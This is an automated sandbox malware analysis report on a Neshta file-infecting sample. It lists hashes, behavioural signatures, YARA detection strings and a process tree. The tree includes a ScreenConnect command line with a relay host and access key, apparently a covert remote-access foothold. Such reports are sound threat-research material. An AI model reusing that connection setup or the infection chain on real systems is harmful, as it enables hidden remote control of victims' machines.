Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report $RUX313H.exe

Overview

General Information

Sample Name:$RUX313H.exe
Analysis ID:495328
MD5:08ea055b45225ec89643836bae3c0446
SHA1:dad2ac19848eb8361e735323d4581e6a724d5b39
SHA256:2abf676ca2b221ca6dd7bd11facf8d003dff541ad4d5618cb86b39e9bfdb906e
Infos:

Most interesting Screenshot:

Detection

ScreenConnect Tool Neshta
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Neshta
Antivirus detection for dropped file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Infects executable files (exe, dll, sys, html)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files with a suspicious file extension
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Yara detected ScreenConnect Tool
Creates files inside the system directory
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services

Classification

Process Tree

  • System is w10x64
  • $RUX313H.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\$RUX313H.exe' MD5: 08EA055B45225EC89643836BAE3C0446)
    • $RUX313H.exe (PID: 6792 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe' MD5: 47264A537967C64B5651F5E2932CA18A)
      • svchost.com (PID: 5568 cmdline: 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi' MD5: 36FD5E09C417C767A952B4609D73A54B)
        • msiexec.exe (PID: 5468 cmdline: C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 5648 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5184 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • rundll32.exe (PID: 5384 cmdline: rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • msiexec.exe (PID: 864 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 3240 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • ScreenConnect.ClientService.exe (PID: 6356 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN' MD5: 79EC78769BF8092719B0E72B174BAB54)
    • ScreenConnect.WindowsClient.exe (PID: 5196 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User' MD5: 5597916ED66980D09C38DD206054CD6F)
  • svchost.exe (PID: 5600 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
$RUX313H.exeJoeSecurity_NeshtaYara detected NeshtaJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0xa0e7:$x1: the best. Fuck off all the rest.
    • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
    • 0xa108:$s1: Neshta
    • 0xa113:$s2: Made in Belarus.
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJoeSecurity_NeshtaYara detected NeshtaJoe Security
      C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
      • 0xa0e7:$x1: the best. Fuck off all the rest.
      • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
      • 0xa108:$s1: Neshta
      • 0xa113:$s2: Made in Belarus.
      • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
      • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
      • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
      C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJoeSecurity_NeshtaYara detected NeshtaJoe Security
        C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
        • 0xa0e7:$x1: the best. Fuck off all the rest.
        • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
        • 0xa108:$s1: Neshta
        • 0xa113:$s2: Made in Belarus.
        • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
        • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
        • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
        Click to see the 219 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmpJoeSecurity_NeshtaYara detected NeshtaJoe Security
              0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.2.svchost.com.400000.0.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
                  • 0xa0e7:$x1: the best. Fuck off all the rest.
                  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
                  • 0xa108:$s1: Neshta
                  • 0xa113:$s2: Made in Belarus.
                  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
                  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
                  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
                  2.2.svchost.com.400000.0.unpackJoeSecurity_NeshtaYara detected NeshtaJoe Security
                    11.0.ScreenConnect.WindowsClient.exe.920000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      11.2.ScreenConnect.WindowsClient.exe.920000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.2.ScreenConnect.ClientService.exe.3db0000.8.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          Click to see the 6 entries

                          Sigma Overview

                          No Sigma rule has matched

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeAvira: detection malicious, Label: W32/Neshta.A
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Neshta.A
                          Antivirus / Scanner detection for submitted sampleShow sources
                          Source: $RUX313H.exeAvira: detected
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeReversingLabs: Detection: 95%
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeReversingLabs: Detection: 95%
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeReversingLabs: Detection: 95%
                          Machine Learning detection for sampleShow sources
                          Source: $RUX313H.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJoe Sandbox ML: detected
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                          Source: 2.2.svchost.com.400000.0.unpackAvira: Label: W32/Neshta.A
                          Source: 0.0.$RUX313H.exe.400000.0.unpackAvira: Label: W32/Neshta.A
                          Source: 0.2.$RUX313H.exe.400000.0.unpackAvira: Label: W32/Neshta.A
                          Source: 2.0.svchost.com.400000.0.unpackAvira: Label: W32/Neshta.A
                          Source: $RUX313H.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                          Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdbzz source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
                          Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp
                          Source: Binary string: c:\Users\jmorgan\Source\ScreenConnectWork\Custom\DotNetRunner\DotNetResolver\obj\Release\DotNetResolver.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmp
                          Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: $RUX313H.exe, 00000000.00000003.661576351.000000000261D000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                          Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: $RUX313H.exe, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp

                          Spreading:

                          barindex
                          Yara detected NeshtaShow sources
                          Source: Yara matchFile source: $RUX313H.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
